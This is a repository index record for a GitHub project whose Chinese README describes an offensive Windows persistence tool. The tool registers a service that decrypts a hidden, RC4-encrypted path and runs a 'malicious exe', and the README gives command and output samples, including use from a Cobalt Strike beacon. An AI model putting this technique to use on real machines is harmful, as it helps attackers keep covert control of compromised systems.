{"id":13841447,"url":"https://github.com/uknowsec/CreateService","last_synced_at":"2025-07-11T12:32:08.954Z","repository":{"id":108747170,"uuid":"297858148","full_name":"uknowsec/CreateService","owner":"uknowsec","description":"创建服务持久化","archived":false,"fork":false,"pushed_at":"2021-04-26T06:43:12.000Z","size":446,"stargazers_count":104,"open_issues_count":0,"forks_count":27,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-11-13T08:11:30.717Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/uknowsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2020-09-23T05:03:52.000Z","updated_at":"2024-09-27T08:22:56.000Z","dependencies_parsed_at":"2023-04-03T13:34:26.899Z","dependency_job_id":null,"html_url":"https://github.com/uknowsec/CreateService","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/uknowsec%2FCreateService/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/uknowsec","download_url":"https://codeload.github.com/uknowsec/CreateService/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225720403,"owners_count":17513597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:11.252Z","updated_at":"2024-11-21T11:30:55.349Z","avatar_url":"https://github.com/uknowsec.png","language":"C++","funding_links":[],"categories":["C++"],"sub_categories":[],"readme":"# CreateService\n\n## 文件说明\n\n- CreateService : 创建服务与删除服务主程序\n- CreateServiceDll ： 创建服务与删除服务rdi\n- TransitEXE ：媒介程序\n\n```\nC:\\Users\\Administrator\\Desktop\u003eCreateService.exe \"C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\" \"C:\\Users\\Administrator\\Desktop\\test.exe\" test start\n[*] CreateService by Uknow\n    [+] ServiceName: test\n    [+] TransitPathName: C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\n    [+] EvilPathName: C:\\Users\\Administrator\\Desktop\\test.exe\n    [+] Success! Service successfully Create and Start.\n```\n\n程序将TransitEXE.exe创建为服务，并将路径`C:\\Users\\Administrator\\Desktop\\test.exe`进行rc4加密（密钥为当前计算机的环境变量PROCESSOR_REVISION）写入`C:\\Users\\Administrator\\Desktop\\TransitEXE.exe`的资源文件中。\n\n服务创建成功后，TransitEXE.exe从自身的资源中解密获取到恶意exe的路径并运行。\n\n这样就只需要提供恶意exe即可，免除临时编译服务模块代码。\n\n\n\n## Cobalt Strike RDI\n```\nbeacon\u003e CreateService C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test start\n[*] Tasked beacon to spawn CreateService ....\n[+] arguments are:C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test start\n[+] host called home, sent: 103053 bytes\n[+] received output:\n[*] CreateService by Uknow\n    [+] ServiceName: test\n    [+] TransitPathName: C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\n    [+] EvilPathName: C:\\Users\\Administrator\\Desktop\\beacon.exe\n    [+] Success! Service successfully Create and Start.\n\nbeacon\u003e CreateService C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test stop\n[*] Tasked beacon to spawn CreateService ....\n[+] arguments are:C:\\Users\\Administrator\\Desktop\\TransitEXE.exe C:\\Users\\Administrator\\Desktop\\beacon.exe test stop\n[+] host called home, sent: 103052 bytes\n[+] received output:\n[*] CreateService by Uknow\n    [+] ServiceName: test\n    [+] TransitPathName: C:\\Users\\Administrator\\Desktop\\TransitEXE.exe\n    [+] EvilPathName: C:\\Users\\Administrator\\Desktop\\beacon.exe\n    [+] Success! Service successfully Stop and Delete.\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fuknowsec%2FCreateService","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fuknowsec%2FCreateService","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fuknowsec%2FCreateService/lists"}